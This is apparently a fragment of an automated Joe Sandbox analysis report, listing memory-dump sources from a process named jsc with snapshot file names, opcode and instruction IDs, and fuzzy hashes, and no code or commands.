                                                                                        • Snapshot File: hcaresult_7_2_158d000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
                                                                                        • Instruction ID: b5af411036ef997b22098dfc97c3da8d0f5a27317fe7644e0153779459e3daf2
                                                                                        • Opcode Fuzzy Hash: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
                                                                                        • Instruction Fuzzy Hash: 76218E76504280DFCB16DF54D9C4B1ABFB2FB88314F2486A9D9491A256C33AD416CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f75c49f642b20d22751cdd9af42726710de8d91f830f4d9a503941948828c40
                                                                                        • Instruction ID: 4bebbc18c7fc50dbebd12aa1e2e649ca8cc9e11ea9fb62cd47ea4fcbee70014c
                                                                                        • Opcode Fuzzy Hash: 2f75c49f642b20d22751cdd9af42726710de8d91f830f4d9a503941948828c40
                                                                                        • Instruction Fuzzy Hash: DA21F2B6D003499FDB20DF9AD844ADEBFF4EB49310F508419E918A7310C375A945CFA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a029ec99f7be200f53d1fdb8866c5ea24995142d89fb9f750f8613087d582c9d
                                                                                        • Instruction ID: 4753a1c77eefa2b7533e2251e41c440a2b3e292987801f5cf58c4e99f3401d36
                                                                                        • Opcode Fuzzy Hash: a029ec99f7be200f53d1fdb8866c5ea24995142d89fb9f750f8613087d582c9d
                                                                                        • Instruction Fuzzy Hash: 3D21F2B6D003499FDB10DFAAD844ADEBBF8FB48320F508419E918A7210C779A954CFA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d098b9f3aaa9ee564f793f19b16abc9b8e9f314187f476fda0dcd82fca579591
                                                                                        • Instruction ID: b42037df42a23d92f1142018af59f633c2c0a43f5eb2a4890cc0d2abf611aea4
                                                                                        • Opcode Fuzzy Hash: d098b9f3aaa9ee564f793f19b16abc9b8e9f314187f476fda0dcd82fca579591
                                                                                        • Instruction Fuzzy Hash: E5212CB590020ADFEB01DFA8D484ADDBBF2AF49304F24C159E4157B324D731AE85CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1431864034.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_159d000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
                                                                                        • Instruction ID: c8880997094bef05f979bf99870acf3e5e0b69be479ca8a8973341af9748a955
                                                                                        • Opcode Fuzzy Hash: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
                                                                                        • Instruction Fuzzy Hash: 9B119D76504280CFDB12CF54D5C4B19BB72FB84324F28C6AAD8494B656C33AD44ACBA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1431864034.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_159d000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                        • Instruction ID: 40c0719f519e619b970d1cec9da95d44963968e051b9e95b9b7f46ac111ea71c
                                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                        • Instruction Fuzzy Hash: 40118B75504280DFDF06CF54D5C4B19BBB2FB88328F24C6AAD9494F696C33AD44ACB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5756a3f978ef235dba778d8d58dbc54c11b3e10d1159b12efdbdfd1518c023bd
                                                                                        • Instruction ID: 46c739ce0509bc765d11cdf9283c00045e7b0f5ac18905c75a71a15803971723
                                                                                        • Opcode Fuzzy Hash: 5756a3f978ef235dba778d8d58dbc54c11b3e10d1159b12efdbdfd1518c023bd
                                                                                        • Instruction Fuzzy Hash: 9101F4763012109FD74AA739F55856D7BF6FFC91203180175E04AC7391DF24AC16C791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 286538abfc1e8f3c79eec5d430d30b59662f7b2febc6ad9a5c31521b2d926631
                                                                                        • Instruction ID: 10dc5c4e01c9ba6bc71901f6293adabf7d5234e2d9c0fc384f9519d4bd03491f
                                                                                        • Opcode Fuzzy Hash: 286538abfc1e8f3c79eec5d430d30b59662f7b2febc6ad9a5c31521b2d926631
                                                                                        • Instruction Fuzzy Hash: 4EF0C876A04208AFEB45EF56E800DAE7BBAEBC4720B00C176E518DB215D7349D058B60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b1357968544debfb428f0a005d03ca3169e08143ea22699fb3d4b98fbb77e8d8
                                                                                        • Instruction ID: 7233211ef3517900456951b5104c7397da77133201fb9289c386a14bd461a7a3
                                                                                        • Opcode Fuzzy Hash: b1357968544debfb428f0a005d03ca3169e08143ea22699fb3d4b98fbb77e8d8
                                                                                        • Instruction Fuzzy Hash: 38F090363001109BD749A739F55852D77E6FBCC1613580238E40EC7790DF24AC128781
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f9733ee6c07e91bd855df70720d1bc04dee4165f8d36d6e8fac5398f95eeff0c
                                                                                        • Instruction ID: 83cde3be6d4badfdb123d884df1be26b07bb0dfe6601155891ab3c0dce1c35f3
                                                                                        • Opcode Fuzzy Hash: f9733ee6c07e91bd855df70720d1bc04dee4165f8d36d6e8fac5398f95eeff0c
                                                                                        • Instruction Fuzzy Hash: E1E01A7310A35CAFCB029E84E8208DB7F29DA46360B188156F9445A152C2B29A61DBE2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 88df708ab24d1141c31f8a71e561bc7869b6c6320fd294ba0bc1c013c6aaa53c
                                                                                        • Instruction ID: fe3976008518c1d8f341f1e6bb9552026e8ef832ac50568ac947283e218db2f7
                                                                                        • Opcode Fuzzy Hash: 88df708ab24d1141c31f8a71e561bc7869b6c6320fd294ba0bc1c013c6aaa53c
                                                                                        • Instruction Fuzzy Hash: 84D0C93615A3548FC342A728E965DD27BF89A0EA2031A81D3E009CF633C621ED48C7E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4c7a6dab534813d32ca725406dbfd493b560dfc8b738e34249371e5b44b0d51e
                                                                                        • Instruction ID: ca618394fb3b2f62e970101bb3dc0693156cb53d2ea8ba884767d20717471023
                                                                                        • Opcode Fuzzy Hash: 4c7a6dab534813d32ca725406dbfd493b560dfc8b738e34249371e5b44b0d51e
                                                                                        • Instruction Fuzzy Hash: D0D06C3314021DBB9F01AE85EC01DDB3B6AEB896A0B148015FE181A211C672AD61ABE1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0b1d3f767f125f11aca5089ed7b9654a72b876648d5d3cc7ab7e4867250df77b
                                                                                        • Instruction ID: 527698e9b178bcc62dd7b31ae4517804af2c697bf4041451259116247350c151
                                                                                        • Opcode Fuzzy Hash: 0b1d3f767f125f11aca5089ed7b9654a72b876648d5d3cc7ab7e4867250df77b
                                                                                        • Instruction Fuzzy Hash: 70B092EB1A8750A2B114B2A19848A5AAA10ABA6B02F418812720D080519A20892EE22B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6eb4d0e7142d8da6c9a3522326dda8e74ba47fcdf57b27e17603e897169087a
                                                                                        • Instruction ID: cfcd3dbe9ccbedfc29f6387e004602e952a918969f9c15ed4aa2f2bfc04105ea
                                                                                        • Opcode Fuzzy Hash: f6eb4d0e7142d8da6c9a3522326dda8e74ba47fcdf57b27e17603e897169087a
                                                                                        • Instruction Fuzzy Hash: 92C012A610E3C079E3035A70AC048057F289A2362470A01C6A2D8450E382245829C327
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                                                        • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                                                                        • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                                                        • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40